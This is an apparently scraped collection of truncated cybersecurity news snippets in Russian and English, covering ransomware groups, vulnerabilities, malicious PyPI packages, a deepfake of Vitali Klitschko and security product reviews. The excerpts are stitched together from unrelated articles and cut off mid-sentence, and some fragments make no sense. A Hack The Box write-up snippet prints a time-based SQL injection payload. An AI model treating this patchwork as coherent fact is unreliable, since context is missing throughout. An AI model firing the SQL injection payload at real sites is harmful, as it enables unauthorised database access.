Китайский техногигант Tencent подвергся атаке с использованием фишинговых QR-кодовAlexander AntipovЗлоумышленники похищали аккаунты пользователей и рассылали непристойную рекламу.

Согласно сообщению компании, хакеры распространяли фишинговые QR-коды, которые якобы предлагали бесплатные игровые аккаунты.

Пользователей, которые сканировали коды, просили пройти аутентификацию, используя данные своих QQ-аккаунтов.

Получив данные жертв, злоумышленники меняли логин и пароль, после чего начали рассылать со украденных аккаунтов рекламу с непристойными и порнографическими материалами.

Также компания призвала пользователей следить за историей входов в аккаунт и не сканировать QR-коды из неизвестных и…

В последней версии библиотеки OpenSSL обнаружена опасная уязвимостьAlexander AntipovУязвимость позволяет удаленному атакующему повредить содержимое памяти процесса.

Уязвимость обнаружена в последней версии OpenSSL 3.0.4 , вышедшей 21 июня 2022 года и затрагивает системы x86_64 с поддержкой инструкций AVX-512 .

Согласно информации из блога ИБ-специалиста Гвидо Вранкена , уязвимость может быть использована удаленным злоумышленником для повреждения содержимого памяти процесса.

Успешная эксплуатация уязвимости может позволить хакеру прочесть и перезаписать до 8129 байт данных за пределами выделенного буфера.

Исправление пока доступно только в виде патча и станет доступно всем пользователям в сл…

Скиммеры украли номера и PIN-коды карт тысяч клиентов Bank of the WestAlexander AntipovБанк оперативно пресекает использование украденной информации и следит за скомпрометированными счетам.

Проверка всей сети банкоматов организации была завершена 18 апреля 2022 года и показала, что кто-то установил скиммеры на неопределенное количество банкоматов.

"Установленное в банкомате скимминговое устройство мешало проведению обычной операции с дебетовой картой и позволяло злоумышленнику украсть номера карт, PIN-коды, имя и адрес жертвы", – говорится в сообщении для пострадавших клиентов банка.

"Украденная информация могла быть использована для создания поддельных дебетовых карт и кражи средств".

По с…

Хакеры атаковали крупнейший британский жилищно-строительный кооперативAlexander AntipovНа данном этапе сложно сказать, сколько времени уйдет на восстановление систем.

Крупнейший в Великобритании жилищно-строительный кооператив Clarion подвергся кибератаке, затронувшей его IT-системы и телефонные линии.

домов, сообщил на своем сайте, что обратился за помощью в восстановлении своих систем к ИБ-компании, но пока рано говорить, пострадали ли какие-либо данные.

Также сложно сказать, сколько времени уйдет на восстановление систем.

На данном этапе никаких свидетельств того, что арендаторам следует уведомить свои банки об инциденте, не обнаружено.

LockBit 3.0 дебютирует вместе с первой в дарквебе Bug BountyAlexander AntipovГруппировка вымогателей обещают вернуть вымогательскому ПО былое величие с помощью киберпреступного краудсорсинга.

Группа разработчиков вымогательского ПО LockBit совсем недавно выпустила свежую версию RaaS (программа-вымогатель как услуга), LockBit 3.0, а вместе с ней и первую в дарквебе Bug Bount y. Хакерская программа по поиску багов предлагает вознаграждение за персональную идентификационную информацию о важных целях, найденные эксплойты безопасности и многое другое.

"Мы приглашаем всех ИБ-специалистов, этичных и неэтичных хакеров планеты", – заявила LockBit.

После прекращения деятельности Conti , LockBit 2.0 н…

«Недостаток общества» провел кибератаку на медуниверситет Австрии.

Alexander AntipovАтака привела к отключению систем и утечке данныхГруппировка Vice Society провела кибератаку на Медицинский университет Инсбрука, которая привела к серьезным сбоям в работе IT-систем и утечке данных.

26 июня Vice Society добавила Медицинский университет Инсбрука на свой сайт утечек данных, обнародовав большой список документов, предположительно украденных во время кибератаки.

«Данные с серверов Медицинского университета Инсбрука были опубликованы в даркнете.

Калифорнийская сеть медучреждений United Health Centers подверглась кибератаке с использованием вымогательского ПО, приведшей к сбоям в работе всех ее ц…

Поддельному Виталию Кличко удалось обмануть несколько европейских мэровAlexander AntipovПо мнению одних, мэры общались с дипфейком, другие же считают, что «Кличко» был сгенерирован с помощью иных технологий.

Мэр Вены Михаэль Людвиг (Michael Ludwig) встречался с «Кличко» в прошлую среду, 22 июня, и даже закончив разговор, не понял, что общался с дипфейком.

Разговор быстро был прерван, и украинская сторона подтвердила, что настоящий Кличко не выходил на связь с бургомистром.

В субботу, 25 июня, настоящий Кличко опубликовал в Twitter видео-сообщение, в котором заявил, что инцидент требует немедленного расследования.

Более того, когда Кличко вращает головой, нет никаких признаков того, что сист…

Rust скоро появится в LinuxAlexander AntipovРазработчик Linux рассказал о планах по внедрению Rust и доверии к создателям репозиториевНа Саммите Linux Foundation , посвященном открытому исходному коду, главный специалист Cardano по открытому исходному коду Дирк Хондел и создатель Linux Линус Торвальдс провели беседу о разработке Linux.

По словам Торвальдса, «производительность выросла, потому что Linux всегда работал над электронной почтой», чтобы обеспечить возможность комфортной удаленной работы.

Когда дискуссия зашла о Rust, Хондел спросил Торвальдса, насколько разработчики близки к включению Rust в ядро ​​Linux.

«Есть реальные технические причины, такие как безопасность памяти, почему R…

К 2030 году Россия перейдет на кибероружие и энергетическое вооружениеAlexander AntipovАрмия России пополнится новым бойцом – искусственным интеллектомВ России развивается система « Пересвет », первого в мире боевого лазерного оружия.

Если посмотреть на рельсотрон, то следует в первую очередь обратить внимание на держатели аккумуляторов рядом с аппаратом.

Для решения этой проблемы российские конструкторы внедрили в вооружение суперконденсаторы (устройства из твердого материала, одновременно аккумулирующие и выделяющие электричество).

Они работают даже при экстремальных температурах, имеют миллионы циклов заряда и разряда и могут быть интегрированы в любой автомобиль, самолет или корабль.

Ав…

8 прогнозов в области ИБ, к которым следует прислушатьсяAlexander AntipovВ ближайшие годы появятся новые законы в области вымогательского ПО, хакеры начнут использовать OT для причинения физического вреда людям и пр.

Большинство руководителей в сфере безопасности и оценки рисков в настоящее время осознают, что уже следующий кризис может принести существенные разрушения.

Итак, чего же, по мнению Gartner, стоит ожидать в области кибербезопасности в следующие несколько лет?

Расширение прав потребителейЗаконодательство в области защиты персональных данных будет расширяться и распространится на 5 млрд человек – более 70% от всего населения Земли.

Кибербезопасность ляжет на плечи генеральных дире…

Уязвимости в системе видеонаблюдения ZoneMinder представляли угрозу для корпоративных и домашних сетейAlexander AntipovЗлоумышленники могли получить доступ во внутреннюю сеть, перехватить видеотрафик и сессии пользователей.

Специалист Positive Technologies Илья Яценко обнаружил две уязвимости в системе видеонаблюдения с открытым исходным кодом ZoneMinder.

Проблемы выявлены в ZoneMinder версии 1.36.14.

Оно используется и дома, и в компаниях, в том числе на промышленных предприятиях.

Если ZoneMinder установлен дома, существует риск перепродажи доступа в даркнете или включения системы видеонаблюдения в каталоги незащищенных видеокамер, к примеру Insecam .

Killnet остановил работу сайтов госучреждений ЛитвыAlexander AntipovDDoS-атака будет продолжаться до тех пор, пока Литва не снимет блокаду Калининграда21 июня российские хакеры Killnet атаковали литовские государственные и частные веб-сайты .

Налоговый орган Литвы заявил, что остановил всю деятельность из-за большого количества попыток подключения к своим системам.

« DDoS-атака будет продолжаться до тех пор, пока Литва не снимет блокаду.

«Вполне вероятно, что в ближайшие дни атаки аналогичной или большей интенсивности будут продолжаться, особенно в транспортном, энергетическом и финансовом секторах», — говорится в заявлении Литовского национального центра кибербезопасности.

По данным центра…

Вместо выкупа вымогателям компания заплатит штраф СШАAlexander AntipovФирма не соблюдала меры защиты и не сообщила о кибератакахАмериканская круизная компания Carnival оштрафована на $5 млн.

По словам Департамента финансов Нью-Йорка, Carnival нарушила государственное регулирование кибербезопасности , не использовав многофакторную аутентификацию , которая затруднила бы доступ злоумышленника к внутренней сети.

Также Carnival не сообщила об одном нарушении и не провела обучение сотрудников по вопросам кибербезопасности.

Carnival впервые стало известно о подозрительной активности в системе электронной почты в мае 2019 года, за 10 месяцев до того, как Carnival сообщила о нарушении.

В заявлении т…

Согласно новому отчёту KeepItOn, за 2021 год выявлено 182 случая полной или частичной блокировки доступа к интернету в 34 странах мира.

ВведениеМеждународное движение KeepItOn опубликовало в начале июня отчёт с результатами глобального исследования по теме выявления случаев блокировки доступа к интернету в 2021 году.

Возможность обхода блокировки: для обхода блокировки следует использовать доверенные и неподконтрольные регулятору DNS-серверы.

Возможность обхода блокировки: для обхода блокировки чаще всего применяют VPN или открытый прокси-сервер HTTPS, который расположен за пределами подвергшейся блокировке сети.

К этому типу блокировки относятся также способы подавления мобильного доступа …

Новая архитектура сетевой безопасности Zero Trust находится сейчас на начальном этапе развития.

ВведениеКорпоративная инфраструктура госучреждений США будет переведена на новую модель сетевой безопасности, получившую название Zero Trust Architecture (ZTA).

ZTA на базе традиционных сетей с поддержкой усиленной идентификацииАрхитектура ZTA порождает новые элементы сетевой инфраструктуры, которые становятся важным фактором формирования новой политики безопасности.

Внедрение ZTA может оказаться чрезмерно дорогимПоявление сетей с новой концептуальной архитектурой ZTA уже давно обсуждается в сетевом сообществе.

Эффективно реализовать в таких условиях новую концепцию, которую закладывают в архитек…

Как не терять эффективность в работе с этими данными?

Расскажем о том, как в условиях повсеместного импортозамещения DataGrain ESO позволяет успешно работать с постоянно растущими объёмами данных в ИБ и максимизировать эффективность в части финансовых затрат на эти процессы.

DataGrain ESO и его возможностиDataGrain ESO (Events Stream Optimization) — система класса CLM (Central Log Management), позволяющая централизованно собирать, фильтровать и профилировать разнородные ИБ-события в большом объёме.

С DataGrain ESO мы пошли иным путём: ESO является не дополнением к SIEM, а самостоятельным решением, которое может интегрироваться с SIEM любого вендора.

Кроме этого, сами по себе решения являютс…

Мы проанализировали новый рейтинг домашних антивирусов от издания AV-TEST, а также составили список топовых антивирусных продуктов, доступных для российских пользователей.

ВведениеНезависимая организация AV-TEST из Магдебурга (Германия) выпустила очередной квартальный отчёт с рейтингом домашних антивирусов для Windows 10.

Набравшие не менее 17,5 баллов получили звание «Лучший продукт по версии AV-TEST» (AV-TEST Top Product).

Список антивирусов для домашних пользователей, протестированных в AV-TESTДоступность антивирусов для российских пользователейДополним список антивирусов, протестированных в лаборатории AV-TEST, указанием того, имеется ли сейчас (16 июня 2022 г.)

ВыводыРынок антивирусов …

То, какие функции должны быть возложены на SOAR, а какие — на SIEM, является непростым вопросом деления функциональности, считает Николай Климов.

Как отметила Анна Богданова, которая горячо поддерживала идею перехода на SOAR, в сервис-деске нет многих полей, которые помогают ускорить процесс принятия решения о реагировании на инцидент.

Будущее рынка SOAR в РоссииВ заключение все участники дискуссии дали свою оценку того, как будет развиваться рынок SOAR в России.

Вячеслав Тупиков поддержал эту оценку, добавив, что хотел бы увидеть в скором будущем появление элементов ИИ в SOAR.

Данил Бородавкин подтвердил уверенность, что рынок SOAR в России ждёт рост.

Можно и просто отказаться работать с вендором, который повёл себя подобным образом, ведь деньги заплачены, а обновления не получены.

В явных минусах — ограниченная функциональность решения для анализа протоколов и серверного ПО в веб-приложении.

В то же время он не обладает функциональностью nmap и может применяться не столько как самостоятельный инструмент, сколько в качестве дополнения.

Некоторые исследователи говорят о том, что в библиотеках открытого исходного кода количество проблем безопасности увеличилось в этом году втрое или даже в пять раз.

Трудности с лицензированием возникли и у Nexpose Vulnerability Scanner — ПО для локального развёртывания в корпоративных сетях, предназначенно…

Привилегированная учётная запись может быть связана как с человеком, так и с процессом, т. е. может являться учётной записью технической службы.

Такие учётные записи в разы увеличивают риск несанкционированного доступа.

Доступ может быть настроен по группам доступных активов и по доступным операциям внутри этих активов (просмотр, изменение, удаление и др.).

Составьте карту, описывающую, какие важные функции зависят от систем (и данных в них) и доступа к ним, и определите самые важные системы, которые должны быть работоспособны и восстановлены в первую очередь в случае нарушения.

Нужно рассортировать все доступы по четырём группам: «для сотрудника», «для приложения или службы», «системные уч…

Функциональные возможности Kaspersky Security CAD 1.1Цифровая модель предприятияПрограммный комплекс Kaspersky Security CAD 1.1 предназначен для максимально детального построения цифровой модели предприятия, в рамках которого разрабатывается соответствующая документация.

Системные требования Kaspersky Security CAD 1.1Kaspersky Security CAD 1.1 представляет собой веб-приложение, устанавливаемое на сервер заказчика и работающее в автономном режиме.

Интерфейс Kaspersky Security CAD 1.1Работа со справочникамиРаботу с Kaspersky Security CAD рекомендуется начинать с наполнения справочников системы.

Построение перечня последствий, возможных при атаке на электропривод, в Kaspersky Security CAD 1.1П…

Источник: Apple WWDCБеспарольная технология PasskeysНовая технология Passkeys была представлена на шоу Apple WWDC 2022 на примере браузера Safari, хотя применять её можно уже на всех обновлённых мобильных устройствах Apple.

Новая функция безопасности предусматривает сквозную поддержку работы с учётными данными на разных платформах, и в этом её главная ценность.

WebAuthn API может стать обязательным стандартомДля реализации беспарольного доступа Apple использует уже существующую API-технологию веб-аутентификации WebAuthn.

Например, в сентябре 2019 года команда «Почты Mail.ru» сообщила о поддержке WebAuthn, став первым в России и в мире сервисом электронной почты, который реализовал возможнос…

Trend Micro Cloud One поддерживает все основные облачные платформы, а её службы можно напрямую интегрировать в процессы и инструменты DevOps.

Workload Security создан на базе флагманского решения Trend Micro Deep Security и обеспечивает комплексную защиту и возможность реагирования на киберинциденты.

Именно так работает один из компонентов комплексной платформы Trend Micro Cloud One, который называется Application Security.

Идея Trend Micro Cloud One Application Security состоит в выявлении атак (например, SQL-инъекций) в настоящем времени.

Компания Trend Micro в рамках своей платформы Cloud One по новому взглянула на эту проблему.

Мы подготовили список шлюзов сетевой безопасности (Secure Web Gateway, SWG) иностранного производства, вендоры которых решили приостановить деятельность на территории России.

Приведём перечень рекомендуемых шлюзов SWG на замену, а также других коммерческих и опенсорсных решений этого класса, позволяющий подобрать оптимальный вариант для внедрения.

После того как многие иностранные вендоры объявили о прекращении деятельности на территории России, вопрос о переходе на продукты отечественных производителей стал острым.

Программно-аппаратный комплекс на основе ОС FreeBSD проходит сертификацию ФСТЭК России по профилю защиты МЭ типа «А» 4-го класса.

Российский вендор: «Смарт-Софт» Solar webProxy …

Балансировка нагрузкиБалансировка в Traffic Inspector Next Generation обеспечивает равномерное распределение сетевой нагрузки между несколькими серверами во внутренней сети.

CMS входит в состав Traffic Inspector Next Generation Enterprise, который предназначен для географически распределённой корпоративной сети, состоящей из нескольких устройств Traffic Inspector Next Generation и единого контрольного центра.

Защита локальной ИТ-инфраструктуры подписчика с помощью Traffic Inspector Next Generation SaaSДля защиты локальной ИТ-инфраструктуры в Traffic Inspector Next Generation SaaS доступна вся базовая функциональность традиционного решения.

Начальная страница интерфейса администратора в Traf…

Proton «лёг»В материале «Медузы» сообщалось о проблемах с доступом к популярным VPN-сервисам Proton VPN, Lantern и Outline VPN, возникших у российских клиентов.

Сервис proton.me продолжает работать нормально (3 июня)Позднее мы сообщали: «В Роскомнадзоре подтвердили введённую блокировку в России сервиса Proton VPN, сославшись на требования закона о “суверенном” рунете.

Сервис Proton VPN предоставляется швейцарским стартапом, появившимся в CERN в рамках работы инкубатора Fongit, которая проводилась как часть программы Horizon 2020.

Именно 27 мая в социальной сети Reddit появилось сообщение о блокировке работы сервиса при попытках подключения из Москвы через Proton VPN; сообщение было размещен…

Но есть и отличие: из двух бочек нефти можно сделать то же, что и из одной, только в два раза больше.

Зато если под рукой обе бочки — можно не только проверить гипотезу, но и построить модель, предсказывающую гастрономические вкусы по стилю одежды и наоборот.

Компания соотносит риск самих данных и выгоду работы с ними при известной безопасности и в некоторых ситуациях может позволить стартапу поиграть со своими данными.

Но, конечно, это слишком жёстко: айтишники — птицы свободолюбивые, да и в постковидную эпоху исключать возможность удалёнки — такое себе.

Остаётся самый логичный вопрос: как обеспечить безопасность данных в песочнице от владельцев песочницы.

С помощью этих данных злоумышленник может выбрать оптимальное время для других атак, — когда абонент находится вне зоны действия сети и не заметит ничего необычного.

Получилось установить запрет на обслуживание в LTE узлах сети и снизить до минимума скорость передачи данных в пакетной сети.

Так что возможность перехватывать входящие вызовы и SMS абонента и отправлять сообщения от его имени сохранилась.

Надежность защиты в этом сегменте зависит не только от вендора, но и от правильности настройки фаервола.

Diameter был работой над ошибками, но и в нем нашлись фундаментальные уязвимости.

Имею парочку VDSок для различных нужд (почта, веб-сервер, хранилка и т.п.)

так вот, возникла необходимость скрывать порты (22, 443 и т.п.)

Немного подумав (идея уже не новая), решил написать простенький, так сказать, ICMP knocker, то есть открытие портов по пингу.

Пример для линукс:ping -s 999 -c1 mysrv.comГде -s - размер отправляемого сообщения, -с количество.

Если совпадает размер сообщения, то для IP-адреса отправителя открываются указанные порты на некоторое время и отравляется сообщение об открытие портов в Телеграмм.

Приватный ключ генерируется на основе пароля пользователя и случайного набора цифр и хранится только на клиенте.

На практике выяснилось, что пусть обойти систему шифрования и не легко, но есть надежный способ расшифровать файлы.

Но базовое объяснение проблемы такое: в Mega позаботились о защите данных, но недостаточно хорошо защитили ключи шифрования.

Нужно реализовать абсолютно иную архитектуру, позволяющую решать проблемы «на лету», эффективно и с сохранением данных пользователям обещаний.

Бизнес тоже можно понять: судя по всему, применение сквозного шифрования «по науке» потребует, по сути, построить новый сервис параллельно существующему и потом поддерживать оба.

Игра эта охватывала многие аспекты финансовой безопасности физических лиц и была не только и не столько развлекательной, сколько обучающей.

Потому что сотрудники — не только самая большая дыра в безопасности, но и самая надёжная защита.

Он должен описывать типичные ситуации атаки и разъяснять, кто из сотрудников что и в какие сроки должен делать.

Звонок или сообщение должны быть «бесстрашными»: помощь и объяснение придут, никто не упрекнёт и не устроит разборки.

Это требует усилий, но это и один из самых надёжных способов защитить свою компанию.

Потому что в школе вынужден ставить детям «поганую винду», от чего его сильно мучает совесть.На этом месте стало интересно…Выпили чаю, разговорились.

Это уже вне основной работы, конечно.По ходу выяснилось, что он сторонник конспирологии — насколько я понял, миром правит некая невидимая власть, строящая козни против простого народа.

Только на смартфонах, потому что их могут проверять на в поисках компромата.

Разговариваешь с толковым программистом, учёным, инженером, коллегой на работе — и не дай бог затронешь «больную» тему в стороне от его специализации.

Не зря говорят: «Блаженство — в неведении».Кстати, принцип «Хабр вне политики» не на пустом месте придумали.

В середине апреля полтысячи криптографов со всего мира собрались на конференции Real World Crypto 2022, впервые за два года встретившись в офлайне, чтобы поделиться мыслями и отдохнуть как следует, благо расслабляющая атмосфера в Амстердаме это позволяет. Традиционная повестка RWC — проблемы безопасности и новые векторы атаки. В этом году главной темой стали уязвимости в «доверенном железе» (trusted hardware). Это встроенные модули и отдельные «железки» типа HSM, хранилища секретов, TPM (trusted platform modules) и TEE (доверенные среды исполнения), защищённые «анклавы» и изолированные «виртуальные машины» внутри чипов. Теперь ситуация в корне изменилась, потому что уязвимости TEE впервые з…

А собранная новая версия уходит сразу и на тестирование безопасности, и на функциональное тестирование.

Функционал Firebase огромен, есть и аналитика, и различные инструменты для мониторинга, и удобные средства для тестирования и дистрибуции сборок для альфа и бета-тестеров.

Google PlayКазалось бы, раз уже реализован Google SSO, то и приложения из маркета скачивать можно без проблем.

В последнее время все больше компаний выкладывают свои приложения в виде android app bundle (aab) , а в этом случае возможна некорректная установка скачанного файла.

Nexus RepositoryКак ни странно, достаточно часто при разработке приложений в закрытом контуре в качестве системы для хранений версий используется …

И — вуаля, невинному гостю удалось проникнуть в сеть компании и получить доступ к конфиденциальной информации.

Некоторые исследования безопасности и уязвимости CEC и EDID вы увидите на слайде 4.

Скопируйте эти данные EDID в EEPROM брандмауэра HDMI и сломайте выступ плоскогубцами, чтобы включить защиту от записи, что не позволит внедрить вредоносную полезную нагрузку.

Подключите брандмауэр к защищаемому монитору, затем подключите кабель, который идёт к ненадёжному устройству на брандмауэре HDMI — это защитит оборудование.

Если устройство не обнаруживает монитор или брандмауэр HDMI, или запись данных EDID в брандмауэр HDMI не удалась, попробуйте подключить брандмауэр другим, качественным кабе…

Сегодня в ТОП-3 — RCE-уязвимость в PHP, раскрытие деталей о малоизвестной APT-группировке, атакующей организации в Европе и Азии, и новая атака DFSCoerce, позволяющая получить контроль над Windows-доменом.

Новости собирала Анна Мельникова, специалист центра мониторинга и реагирования на инциденты ИБ Jet CSIRT компании «Инфосистемы Джет».

Специалисты QNAP обнаружили RCE-уязвимость в PHPУязвимость отслеживается как CVE-2019-11043 и имеет рейтинг критичности 9,8 по шкале CVSS.

Вредоносное ПО выполняет произвольный код C# и позволяет хакеру удаленно управлять сервером и перемещаться внутри целевой сети.

В некоторых случаях Samurai инициировал запуск инструмента для пост-эксплуатации Ninja, в за…

Как и обещали – продолжаем выискивать для Вас годные расширения для браузера Google CHROME, которые помогут в нелегком деле поиска информации в открытых источниках.

Ну а теперь у нас на очереди еще Х полезных для OSINT и не только расширений.

DISCLAIMER: Данная статья написана в ознакомительных целях и не является руководством к неправомерным действиям или обучающим материалом для сокрытия правонарушений.

Map Switcher – позволяет быстро переключаться между различными сервисами электронных карт, так еще и конвертацию координат делает.

Надеемся, что вы нашли для себя новые расширения которые помогут вам не только в работе, но и войдут в повседневное использование.

И что такое СХД – тоже.

Да и тебя заодно.

А что в результате?

Всё одно и то же… В общем, в рекламке речь про автоматизацию твоих мужиков с ломом.

Это как если б тысяча мужиков и с ломом, и с топором, и с киркой прошли.

Он:Следит за созданием ServiceAccount и создает соответствующий Secret токена ServiceAccount для доступа к API.

Следит за удалением ServiceAccount и удаляет все соответствующие Secrets токенов ServiceAccount.

Следит за добавлением Secret токена ServiceAccount, проверяет наличие исходного ServiceAccount и при необходимости добавляет токен к Secret.

Следит за удалением Secret и при необходимости удаляет ссылку из соответствующего ServiceAccount.

build-robot-secretkubectl createСобытие create по инициативе пользователя kubernetes-admin — это имя первого пользователя по умолчанию в кластере kubeadm.

Все это — что­бы прой­ти слож­ную машину Phoenix с пло­щад­ки В сегод­няшнем рай­тапе мы с тобой сно­ва попен­тестим WordPress.

Все это — что­бы прой­ти слож­ную машину Phoenix с пло­щад­ки Hack The Boxwarning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN.

Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

subscribe_ topic=1%20union%20select%201%20and%20sleep(10)Ес­ли уяз­вимость сра­бота­ет, то сер­вер будет отве­чать боль­ше 10 с. …

На этот раз библиотеки были пойманы на краже конфиденциальной информации, включая учетные данные от AWS, причем после похищения информация хранилась в файлах .TXT, доступная всем желающим.

Эксперты пишут, что пакеты loglib-modules и pygrata-utils были созданы для кражи данных, в том числе учетных данных от AWS, информации о сетевом интерфейсе и переменных среды.

Одной из наиболее интересных особенностей этой кампании стало то, что после передачи данных в домен PyGrata[.

Вскоре после этого эндпоинт пропал из открытого доступа, а Sonatype так и не получила ответа.

Похоже, это говорит о том, что кража данных осуществлялась отнюдь не в исследовательских целях.

Японская компания TB Kawashima, входящая в состав Toyota Boshoku (производитель автомобильных компонентов), которая, в свою очередь, входит в группу компаний Toyota, объявила, что одно из ее дочерних предприятий подверглось хакерской атаке.

TB Kawashima — производитель интерьерных тканей для автомобилей, самолетов, поездов и так далее, чьи офисы с заводы расположены в США, Китае, Таиланде, Индонезии и Индии.

Представители TB Kawashima подчеркивали, что инцидент не повлиял на производственную и торговую деятельность Toyota Boshoku Group, и работа продолжается в обычном режиме.

Хотя производитель не сообщал, с какой малварью или хакерской группой связана эта атака, ответственность за инцидент…

Итальянское Управление по защите данных (Garante per la Protezione dei Dati Personali) признало, что использование Google Analytics не соответствует правилам ЕС о защите данных.

Ранее к аналогичным выводам пришли ведомства в Австрии и Франции.

Еще на прошлой неделе итальянское ведомство обвинило местного веб-издателя (Caffeina Media SRL) в использовании Google Analytics, так как инструмент позволял незаконно передавать данные пользователей в США без необходимых гарантий безопасности.

Вышеупомянутому сайту, Caffeina Media SRL, было дано 90 дней на то, чтобы отказаться от использования Google Analytics, в соответствии с GDPR (Общий регламент по защите данных).

Интересно, что ранее в этом меся…

ИБ-эксперт, известный под ником mr.d0x, разработал новую технику атак, которая злоупотребляет приложениями Microsoft Edge WebView2 для кражи аутентификационных файлов cookie.

Дело в том, что Microsoft Edge WebView2 позволяет встроить в нативные приложения браузер (с полной поддержкой HTML, CSS и JavaScript), используя Microsoft Edge (Chromium) для рендеринга.

Используя эту технологию, приложения могут загружать любой сайт внутри самого приложения и отображать его так, будто он открыт в Microsoft Edge.

При этом похитить можно любые файлы cookie, отправленные удаленным сервером после входа пользователя в систему, включая и cookie для аутентификации.

Также mr.d0x пишет, что приложения WebView2…

Согласно Google Trends, за последние 90 дней, после того как Microsoft объявила о приостановке официальных продаж в России, количество запросов в Google, связанных со способами активации Windows 10, выросло на 80–250% в зависимости от формулировки.

При этом в службе поддержки «М.Видео» по Москве и Московской области сообщили, что «ни электронной, ни коробочной версий Windows нет в наличии».

В поддержке «Ситилинка» и DNS заявили, что товар есть как на складе, так и в магазинах (однако пресс-служба не ответила на запросы журналистов).

На фоне проблем с Windows в России начал расти спрос и на российские ОС, утверждают разработчики.

До конца года в «Ред Софте» и вовсе ожидают трехкратного увели…

Навер­няка в детс­тве ты дер­жал в руках паяль­ник, но если с тех пор так и не разоб­рался, как паять пра­виль­но, то эта статья для тебя.

Если ты рас­потро­шишь, нап­ример, каль­кулятор, внут­ри ты уви­дишь, что абсо­лют­но все элек­трон­ные ком­понен­ты внут­ри него спа­яны меж­ду собой.

Паяльник с керамическим нагревателемВнут­ри такого паяль­ника находит­ся керами­чес­кий стер­жень, который наг­рева­ется, ког­да к его кон­тактам про­водят нап­ряжение.

Есть у такого паяль­ника и минусы — керами­чес­кий наг­реватель не прис­пособ­лен к физичес­ким воз­дей­стви­ям, а жала для такого паяль­ника нуж­ны будут «род­ные».

Стан­ции хороше­го качес­тва сто­ят в нес­коль­ко раз дороже обыч­ных пая…

Хакерские инструменты итальянской компании RCS Lab использовались для слежки за пользователями смартфонов Apple и Android в Италии и Казахстане, сообщили эксперты компании Google.

По словам аналитиков Google TAG, компания RCS Labs является лишь одним из 30 поставщиков шпионского ПО, активность которых они отслеживают.

«Мы считаем, что в некоторых случаях злоумышленники сотрудничали с интернет-провайдером жертвы, чтобы отключить ей мобильную передачу данных, — говорится в отчете.

Google сообщает, что уже уведомил владельцев устройств на Android о том, что их девайсы были взломаны и заражены шпионским ПО.

При этом, к сожалению, не удалось понять, кто был мишенью обнаруженной кампании, и кто и…

Исследователи предупреждают, что злоумышленники используют эксплоит для уязвимости нулевого дня в устройствах Mitel MiVoice VoIP для проникновения в сети компаний и получения начального доступа.

Уязвимости был присвоен идентификатор CVE-2022-29499 (9,8 балла из 10 по шкале CVSS), и разработчики Mitel исправили ее в апреле 2022 года.

Уязвимость была связана с компонентом Mitel Service Appliance MiVoice Connect, используемом в SA 100, SA 400 и Virtual SA.

Известно, что хакеры использовали уязвимость для создания реверс-шеллов, задействовав FIFO-каналы на целевом устройстве Mitel и отправляя исходящие запросы из скомпрометированной сети.

Но стоит заметить, что независимый ИБ-эксперт Кевин Бомо…

Компания Cyble опубликовала отчет, посвященный новому вредоносному инструменту Quantum Lnk Builder, который недавно начал продаваться на черном рынке, имеет графический интерфейс и позволяет создавать вредоносные файлы ярлыков Windows (.LNK), подделывать расширения, выбирая более чем из 300 иконок, а также обходить UAC и Windows SmartScreen.

Помимо этого билдер позволяет поместить «нескольких полезных нагрузок в файл .LNK», а также имеет возможности для создания пейлоада в форматах .HTA и .ISO.

Из-за этого файлы LNK часто используются для распространения малвари, особенно в фишинговых кампаниях.

Как было сказано выше, помимо создания файлов .LNK, Quantum предлагает обход UAC и Windows Smart…

Well, the Google app uses code that does not come integrated with the app itself.

Top Mobile Security ThreatsData LeaksWhen you download a new app on your smartphone and launch it, you must pay attention to the pop screen that appears.

When your mobile device sends a request to a network, the firewall forwards a verification request to the network.

When your mobile device sends a request to a network, the firewall forwards a verification request to the network.

ConclusionThe mobile threats are evolving with time, and they will keep on improving further as well.

Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor.

"During the initial attacks, the group exploited an MS Exchange vulnerability to deploy ShadowPad malware and infiltrated building automation systems of one of the victims," the company said.

"By taking control over those systems, the attacker can reach other, even more sensitive systems of the attacked organization."

"During the attacks of the observed actor, the ShadowPad backdoor was downloaded onto the attacked computers under the guise of legitimate software," Kaspersky said.

"Building automation systems are rare targets for a…

The latest version of the OpenSSL library has been discovered as susceptible to a remote memory-corruption vulnerability on select systems.

The issue has been identified in OpenSSL version 3.0.4, which was released on June 21, 2022, and impacts x64 systems with the AVX-512 instruction set.

OpenSSL is a popular cryptography library that offers an open source implementation of the Transport Layer Security (TLS) protocol.

"I do not think this is a security vulnerability," Tomáš Mráz of the OpenSSL Foundation said in a GitHub issue thread.

On the other hand, Alex Gaynor pointed out, "I'm not sure I understand how it's not a security vulnerability.

A previously unknown Android banking trojan has been discovered in the wild, targeting users of the Spanish financial services company BBVA.

Unlike other banking malware that are known to target a wide range of financial apps, Revive is tailored for a specific target, in this case, the BBVA bank.

That said, it's no different from its counterparts in that it leverages Android's accessibility services API to meet its operational objectives.

Revive is mainly engineered to harvest the bank's login credentials through the use of lookalike pages and facilitate account takeover attacks.

The findings once again underscore the need to exercise caution when it comes to downloading apps from third-par…

The Black Basta ransomware-as-a-service (RaaS) syndicate has amassed nearly 50 victims in the U.S., Canada, the U.K., Australia, and New Zealand within two months of its emergence in the wild, making it a prominent threat in a short window.

"Black Basta has been observed targeting a range of industries, including manufacturing, construction, transportation, telcos, pharmaceuticals, cosmetics, plumbing and heating, automobile dealers, undergarments manufacturers, and more," Cybereason said in a report.

Similar to other ransomware operations, Black Basta is known to employ the tried-and-tested tactic of double extortion to plunder sensitive information from the targets and threaten to publish…

"Shadow IDs," or in other words, unmanaged employee identities and accounts in third-party services are often created using a simple email-and-password-based registration.

So when Shadow IDs are left behind, they create an everlasting risk unseen and unmanaged by anyone.

How to Report on Shadow IT and Shadow IDs?

To discover and manage Shadow IDs and Shadow IT, there needs to be application and account-level monitoring in place, that can create a trusted, global source of truth across the organization.

Scirge is a browser-based tool that provides complete visibility into Shadow IDs and Shadow IT, password hygiene for corporate and third-party business web accounts, and even real-time employ…

CODESYS has released patches to address as many as 11 security flaws that, if successfully exploited, could result in information disclosure and a denial-of-service (DoS) condition, among others.

